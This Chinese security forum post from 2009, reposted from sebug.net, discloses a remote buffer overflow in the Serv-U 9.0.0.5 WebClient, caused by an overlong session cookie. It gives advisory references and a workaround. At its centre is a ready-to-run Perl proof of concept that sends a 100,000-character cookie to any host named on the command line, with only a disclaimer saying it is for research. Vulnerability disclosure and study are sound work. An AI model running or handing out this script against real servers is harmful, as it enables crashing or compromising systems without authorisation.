Board logo

标题: Serv-U Web客户端HTTP请求远程溢出漏洞 [打印本页]

作者: zclzhao    时间: 2009-11-7 10:22     标题: Serv-U Web客户端HTTP请求远程溢出漏洞

影响版本:
RhinoSoft Serv-U 9.0.0.5漏洞描述:
BUGTRAQ  ID: 36895

Serv-U FTP是一款FTP服务程序。

Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。<*参考  
http://www.rangos.de/ServU-ADV.txt
http://secunia.com/advisories/37228/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!---snip---
use IO::Socket;

$|=1;
$a = "A" x 100000;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => ’80’,
                              Proto    => ’tcp’);                             

print $sock "POST / HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb950754581406246bf8$a\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
."Content-Length: 0\r\n\r\n";

while (<$sock>) {
    print;
}
---snip---
SEBUG安全建议:
临时解决方法:

* 禁用WebClient服务,仅使用Serv-U FTP/SFTP组件。

厂商补丁:

RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.serv-u.com/




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2